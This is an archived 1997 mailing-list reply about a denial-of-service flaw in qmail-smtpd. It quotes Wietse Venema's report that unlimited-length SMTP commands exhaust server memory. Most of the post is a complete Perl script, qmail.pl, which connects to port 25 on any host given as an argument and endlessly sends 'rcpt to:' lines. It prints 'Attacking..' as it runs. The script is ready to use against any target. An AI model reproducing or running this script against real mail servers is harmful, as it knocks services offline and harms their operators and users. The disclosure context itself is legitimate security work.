Re: Denial of service (qmail-smtpd)

super@UFO.ORG
Thu, 12 Jun 1997 07:04:01 -0700

>Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT)
>From: Wietse Venema <wietse@wzv.win.tue.nl>
>To: djb-qmail@koobera.math.uic.edu
>Subject: Denial of service (qmail-smtpd)
>
>While implementing my own mailer, I went over the qmail source code
>and noticed that qmail is susceptible to a very trivial denial of
>service attack. By sending SMTP commands of unlimited length, an
>attacker can make the machine run out of memory, thus rendering it
>completely unusable.
>
>Below is a little program that demonstrates the problem. When I
>wrote this I was in C mode; it could probably be done with a much
>smaller PERL program.
You're right, it could.
------------------------------ qmail.pl ------------------------------
#!/usr/local/bin/perl -w
# $Id: qmail.pl,v 1.4 1997/06/12 02:12:42 super Exp $
require 5.002;
use strict;
use Socket;
if(!($ARGV[0])){print("usage: $0 FQDN","\n");exit;}
my $port = 25; my $proto = getprotobyname("tcp");
my $iaddr = inet_aton($ARGV[0]) || die "No such host: $ARGV[0]";
my $paddr = sockaddr_in($port, $iaddr);
socket(SKT, AF_INET, SOCK_STREAM, $proto) || die "socket() $!";
connect(SKT, $paddr) && print("Connected established.\n") || die "connect() $!";
send(SKT,"mail from: <me\@me>\n",0) || die "send() $!";
my $infstr = "rcpt to: <me\@" . $ARGV[0] . ">\n"; print("Attacking..","\n");
while(<SKT>){
send(SKT,$infstr,0) || die "send() $!";
}
die "Connection lost!";
------------------------------ qmail.pl ------------------------------

.--------------------------------.
| super@innu.org |
|--------------------------------|
| http://www.ce.net/users/super/ |
| Fight SPAM! www.cauce.org |
| S@IRC |
`--------------------------------'